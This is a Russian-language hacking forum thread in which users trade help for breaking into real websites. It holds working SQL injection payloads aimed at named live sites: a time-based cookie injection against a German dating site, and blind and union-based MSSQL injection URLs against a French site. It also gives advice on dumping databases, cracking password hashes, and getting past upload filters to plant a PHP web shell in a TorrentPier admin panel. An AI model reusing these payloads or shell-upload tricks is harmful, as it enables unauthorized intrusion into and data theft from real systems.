Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. andrxx

    andrxx Banned

    Joined:
    7 Nov 2013
    Messages:
    51
    Likes Received:
    6
    Reputations:
    0
    mysqldump
     
  2. 5maks5

    5maks5 Elder - Старейшина

    Joined:
    29 Aug 2010
    Messages:
    451
    Likes Received:
    264
    Reputations:
    40
    SQLYog. PHP Gate кидаешь на хост, где mysql расположен, с компа подключаешься.
    Единственный минус - будет долго рожать.
    Базы от нескольких гб - от получаса.
    Зато валидный дамп, что не может не радовать.
     
  3. Xsite

    Xsite Member

    Joined:
    21 Jan 2010
    Messages:
    53
    Likes Received:
    5
    Reputations:
    0
    Ребят помогите советом )

    При "расковыривании" инъекций допустим тайм блинд ,скл меп ,оооочень долго дампит ,допустим 1 фразу ,слово и тд и тп. Если варианты ,слить дб при таких инъекциях быстрее ?
     
  4. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    слить быстрее через инъекцию основанную на задержках? ну не знаю :) склмап не всегда точно может определить подходящий для случая вектор, поэтому пробуйте сначала руками, и если есть другие варианты — автоматизируйте сами.
     
    _________________________
  5. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Есть замечательный вектор превращения Time-Based в Error-Based. Работает много где.

    Могу показать, если дашь линк.
     
    _________________________
  6. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,114
    Likes Received:
    830
    Reputations:
    231
    Выковыривай админа и пробуй залить шелл через админку или если в самой админке есть сделать бэкап бд. так же не забывай про --passwords --users --hostname при удачном стечении обстоятельств можно подключиться напрямую к бд )

    2BigBear на таком получится?
    GET /registrierung/step0_vip.html HTTP/1.1
    Cookie: PHPSESSID=kk7rupflro2bf33ljdq2d5pqp0; besuchersession=*; erstzugriff=kk7rupflro2bf33ljdq2d5pqp0
    X-Requested-With: XMLHttpRequest
    Referer: http://www.-----.de:80/
    Host: www.lovepoint.de
    Connection: Keep-alive
    Accept-Encoding: gzip,deflate
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
    Accept: */*

    Вектор PHPSESSID=kk7rupflro2bf33ljdq2d5pqp0; besuchersession=') AND SLEEP(5) AND ('KgRw'='KgRw; erstzugriff=kk7rupflro2bf33ljdq2d5pqp0
     
    _________________________
    #23926 grimnir, 5 Mar 2015
    Last edited: 5 Mar 2015
  7. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Вот пример из выше, сайт затер

    http://www.site.ru/?param=1%27+and+if(substr((select+@@version),1,1)=5,1,(select+1+union+select+2))=%271

    TRUE - нет ошибки

    http://www.site.ru/?param=1%27+and+if(substr((select+@@version),1,1)=4,1,(select+1+union+select+2))=%271

    FASLE - есть ошибка

    На этом попробуй также
     
    _________________________
    1 person likes this.
  8. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    http://www.cstb.fr/fileadmin/app/atec/modATEC/cpt.php?id_avi=2012319
    хелп
     
  9. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    blind-mssql
    Code:
    http://www.cstb.fr/fileadmin/app/atec/modATEC/cpt.php?id_avi=2012319%20waitfor%20delay%20%270:0:10%27--+
    union-based mssql:
    Code:
    http://www.cstb.fr/fileadmin/app/atec/modATEC/cpt.php?id_avi=-2012319%20UNION%20ALL%20SELECT%20@@version,%27lol%27--
    тыкаешь на lol, смотришь вывод
     
    _________________________
    1 person likes this.
  10. teh

    teh Member

    Joined:
    2 Dec 2010
    Messages:
    79
    Likes Received:
    6
    Reputations:
    -2
    Привет. Посоветуйте, что дальше делать если нашел на сайте phpinfo. Вроде инфа там написана, а что делать не знаю
     
  11. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Попей чаю, посмотри фильм, познай дзен в конце концов.

    Вывод функции phpinfo() раскрывает лишь служебную информацию, такую как настройки определённых переменных и полные пути к скриптам на сайте.

    Имея только чистый phpinfo() максимум, что можно провести Reflected-XSS через URL в старых версиях.

    Обычно этот файл используется в совокупности с другими уязвимостями. И практически никогда (за исключением выше написанного) - без них.
     
    _________________________
  12. teh

    teh Member

    Joined:
    2 Dec 2010
    Messages:
    79
    Likes Received:
    6
    Reputations:
    -2
    нашел в site/info.php других уязвимостей не нашел. спасибо
    А если хеш пароля не могу рашифровать онлайн, как еще можно разшифровать?
     
  13. usasoft

    usasoft Member

    Joined:
    29 Sep 2007
    Messages:
    102
    Likes Received:
    22
    Reputations:
    6
    еще использовать программы для расшифровки, такие как hashcat, jtr, egb
     
  14. teh

    teh Member

    Joined:
    2 Dec 2010
    Messages:
    79
    Likes Received:
    6
    Reputations:
    -2
    Еще одни вопрос. Нашел я на сайте папку manual -> site/manual/ здесь что то про apache. Можно что то вытащить?
     
  15. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    Нет!
     
    _________________________
  16. d4rk73rr0r

    d4rk73rr0r Member

    Joined:
    2 Jan 2013
    Messages:
    143
    Likes Received:
    6
    Reputations:
    0
    Есть доступ в админке Торрент пиер, версия 2.4 Stable (R400). Добавлю php расширения чтоб залить шелл, загружаю пхп шелл, но расширении шелла после загрузки изменяется вот таком виде _php_. Есть ли еще способы залить шелл? Уважаемые помогите.
     
  17. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    py, shtml, cgi, pl, phtml

    А вообще надо посмотреть по какой маске файл переименовывается.
     
    _________________________
  18. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    Видно что обрабатывается регуляркой, к перечисленному можно также поиграться с регистром букв в расширении.
     
    _________________________
    1 person likes this.
  19. d4rk73rr0r

    d4rk73rr0r Member

    Joined:
    2 Jan 2013
    Messages:
    143
    Likes Received:
    6
    Reputations:
    0
    Спасибо, сделал как вы сказали Шелл залился. но еще один косяк появился "403 Forbidden". Видимо там есть .htaccess. А можно ли таким способам залить пустой .htaccess?
     
  20. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    729
    Reputations:
    948
    Ребята, так от же код есть! https://get.torrentpier.me/?old=1 Качните и посмотрите код что да и как там кому нужно.
     
Thread Status:
Not open for further replies.